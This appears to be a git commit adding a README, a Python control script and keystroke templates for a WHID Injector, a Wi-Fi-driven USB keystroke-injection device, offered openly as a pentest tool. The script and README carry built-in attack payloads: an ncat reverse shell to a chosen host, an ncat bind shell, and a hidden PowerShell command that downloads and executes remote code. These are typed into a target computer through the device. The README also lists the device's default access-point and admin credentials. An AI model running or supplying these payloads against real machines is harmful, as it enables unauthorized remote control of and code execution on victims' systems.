Beta release - Simple shells and commands exec

README.md

@@ -1,2 +1,69 @@
-# WHID_Toolkit
+# WHID Injector
-Simple script for the WHID injector - a rubberducky wifi
+**Disclaimer: Little project to interact with the WHID, mostly because I didn't wanted to modify the firmware to support my keyboard, feel free to improve it ;)**
+
+What is it ? It's a simple script to send commands (french keyboard) from your terminal to the WHID Injector. It will automatically convert the "azerty" to "qwerty" format. Furthermore it has builtins payload such as reverse-shell and bind-shell.
+
+Where to buy a WHID Injector ? I got mine from [Aliexpress](https://www.aliexpress.com/item/Cactus-Micro-compatible-board-plus-WIFI-chip-esp8266-for-atmega32u4/32318391529.html)
+
+## How to start
+Connect to the Access Point with the SSID "**Exploit**" with a password of "**DotAgency**".   
+Open a web browser pointed to "**http://192.168.1.1**"    
+The default administration username is "**admin**" and password "**hacktheplanet**".       
+Remember to upgrade the firmware you will find the version 2.7 in this repository    
+More info on the official Github : https://github.com/whid-injector/WHID
+
+## How to use the script
+```python
+python3 WHIDInjector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt -a -h                                                                          127 ↵
+usage: WHIDInjector.py [-h] [-v] [--host [HOST]] [--port [PORT]]
+                       [--user [USER]] [--pass [PASS]] [--panel [PANEL]]
+                       [--payload [PAYLOAD]]
+
+optional arguments:
+  -h, --help           show this help message and exit
+  -v                   Verbosity of the output
+  --host [HOST]        Host reverse-shell
+  --port [PORT]        Port reverse-shell
+  --user [USER]        Wifi Panel username
+  --pass [PASS]        Wifi Panel password
+  --panel [PANEL]      Wifi Panel password
+  --payload [PAYLOAD]  Payload template
+```
+
+Targeting a Windows OS
+```
+python3 WHIDInjector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt
+```
+
+Send a simple reverse-shell payload
+```python
+$ python3 WHIDInjector.py -v --host 127.0.0.1 --port 4444                                                                                                                 1 ↵
+
+     -------------------------------------------------------------
+      WHID injector - You need to be connected to the Exploit AP
+     -------------------------------------------------------------
+                   __   °
+                 <(o )___
+                  ( ._> /
+                   `---'                      @pentest_swissky
+
+Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'
+-------------------------------------------------------------------
+>>> reverse
+Payload:
+Rem:Default Payload
+Press:130+195
+CustomDelay:1000
+Print:bqsh 6c 4nohup ncqt !@&<)<)<! $$$$ 6e ]SHELL 14
+CustomDelay:1000
+Press:176
+
+Sending payload to http://192.168.1.1/runlivepayload
+```
+
+
+
+# What's next  ?
+TODO change_ssid_name    
+TODO change_ssid_pass    
+TODO update_firmware     

WHIDInjector.py

@@ -0,0 +1,137 @@
+#!/usr/bin/python3
+# -*- coding: utf-8 -*-
+import requests
+import argparse
+from urllib.parse import urlencode, quote_plus
+
+def banner():
+    print("""
+    \033[93m -------------------------------------------------------------\033[0m
+    \033[1m  WHID injector - You need to be connected to the Exploit AP\033[0m
+    \033[93m -------------------------------------------------------------
+                   __   °
+                 <(o )___
+                  ( ._> /
+                   `---'\033[0m                      @pentest_swissky
+    """)
+    print("Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'")
+    print("-------------------------------------------------------------------")
+
+def help():
+    print("--------------[ Commands ]--------------")
+    print("Comment     => Rem: Comment")
+    print("Delay       => CustomDelay:1000")
+    print("Send key    => Press:X+Y, Press:131+114")
+    print("Send text   => Print:XYZ")
+    print("Move mouse  => MouseMoveUp:X, MouseMoveDown:X, MouseMoveLeft:X, MouseMoveRight:X")
+    print("Mouse click => MouseClickLEFT:X, MouseClickRIGHT:X, MouseClickMIDDLE:X")
+    print("Blink led   => BlinkLED:X")
+    print("The work around for writing a script that requires a '<' is to replace all instances of '<' with '&lt;'.")
+    print("")
+    print("--------------[ KeyboardModifiers ]--------------")
+    print("Key           Decimal| Key           Decimal")
+    print("KEY_LEFT_CTRL    128 | KEY_LEFT_SHIFT    129")
+    print("KEY_LEFT_ALT     130 | KEY_LEFT_GUI      131")
+    print("KEY_RIGHT_CTRL   132 | KEY_RIGHT_SHIFT   133")
+    print("KEY_RIGHT_ALT    134 | KEY_RIGHT_GUI     135")
+    print("KEY_UP_ARROW     218 | KEY_DOWN_ARROW    217")
+    print("KEY_LEFT_ARROW   216 | KEY_RIGHT_ARROW   215")
+    print("KEY_BACKSPACE    178 | KEY_TAB           179")
+    print("KEY_RETURN       176 | KEY_ESC           177")
+    print("KEY_INSERT       209 | KEY_PAGE_UP       211")
+    print("KEY_DELETE       212 | KEY_HOME          210")
+    print("KEY_END          213 | KEY_CAPS_LOCK     193")
+    print("KEY_F1           194 | KEY_F2            195")
+    print("KEY_F3           196 | KEY_F4            197")
+    print("KEY_F5           198 | KEY_F6            199")
+    print("KEY_F7           200 | KEY_F8            201")
+    print("KEY_F9           202 | KEY_F10           203")
+    print("KEY_F11          204 | KEY_F12           205")
+
+
+def convert_to_keymap(user_input, payload):
+    # TODO find > < and |
+    fr_mapping = './mazqwAZQW&é"\'(-è_çà)^$Mù,?;:!§1234567890'
+    en_mapping = '<>;qwazQWAZ1234567890-[]:\'mM,./?!@#$%^&*()'
+    user_converted = user_input.translate(str.maketrans(fr_mapping,en_mapping))
+    user_converted = payload % user_converted
+    return user_converted
+
+
+def send_payload(user_converted, panel):
+    payloads = { "livepayload":user_converted, "livepayloadpresent":1}
+    encoded  = urlencode( payloads, quote_via=quote_plus)
+    try:
+        print('Sending payload to %s' % panel)
+        if not "200" in str(requests.post(panel, data=encoded)):
+            print("\033[91mError 404, are you connected on the right AP?")
+
+    except Exception as e:
+        print("\033[91mError, couldn't reach the Wifi Portal !")
+
+
+def check_panel(panel):
+    try:
+        if not "ESPloit" in requests.get(panel, timeout=1).text:
+            print("\033[91mError 404, are you connected on the right AP?")
+    except Exception as e:
+        print("\033[91mError, couldn't reach the Wifi Portal !\033[0m")
+
+
+if __name__ == "__main__":
+
+    # Parsing argument from command line
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-v', action='store_true', dest='verbose',help='Verbosity of the output')
+    parser.add_argument('--host', nargs='?', default='127.0.0.1',     help='Host reverse-shell' )
+    parser.add_argument('--port', nargs='?', default='4242',          help='Port reverse-shell' )
+    parser.add_argument('--user', nargs='?', default='admin',         help='Wifi Panel username')
+    parser.add_argument('--pass', nargs='?', default='hacktheplanet', help='Wifi Panel password')
+    parser.add_argument('--panel',nargs='?', default='http://192.168.1.1', help='Wifi Panel password')
+    parser.add_argument('--payload', nargs='?', default='payloads/default.txt', help='Payload template')
+    results = parser.parse_args()
+
+    # Default payload
+    payload = ""
+    with open(results.payload,'r') as f:
+        payload = f.read()
+
+    banner()
+    check_panel(results.panel)
+    while(True):
+        user_input = input("\033[92m>>> \033[0m")
+
+        # Simple user interactions
+        if user_input == "q" or user_input=="exit":
+            exit()
+
+        elif user_input == "h" or user_input == "help":
+            help()
+            continue
+
+        # Reverse Shell Linux
+        elif user_input == "reverse":
+            user_input = "bash -c 'nohup ncat %s %s -e $SHELL &'" % (results.host, results.port)
+
+        # Bind Shell Linux
+        elif user_input == "bind":
+            user_input = "bash -c 'nohup ncat -lvp %s -e $SHELL -k &'" % (results.port)
+
+        # Empire or anything for Windows
+        elif "empire" in user_input :
+            # Recommended https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
+            args = user_input.split(" ")
+            user_input = "powershell -W Hidden -nop -noni -c \"IEX (New-Object Net.Webclient).downloadstring('%s')\"" % args[1]
+
+
+        # Send evil payload
+        if user_input != "":
+
+            # Convert from AZERTY to QWERTY
+            user_converted = convert_to_keymap(user_input, payload)
+
+            if results.verbose == True:
+                print('\033[92mPayload:\033[0m\n%s' % user_converted)
+
+            # Send the payload
+            send_payload(user_converted, results.panel+"/runlivepayload")

payloads/default.txt

@@ -0,0 +1,6 @@
+Rem:Command Execution
+Press:130+195
+CustomDelay:1000
+Print:%s
+CustomDelay:1000
+Press:176

payloads/i3.txt

@@ -0,0 +1,6 @@
+Rem:Command Execution for i3
+Press:131+176
+CustomDelay:1000
+Print:%s
+CustomDelay:1000
+Press:176

payloads/windows.txt

@@ -0,0 +1,5 @@
+Rem:Command Execution for Windows
+Press:131+114
+CustomDelay:1000
+Print:%s
+CustomDelay:1000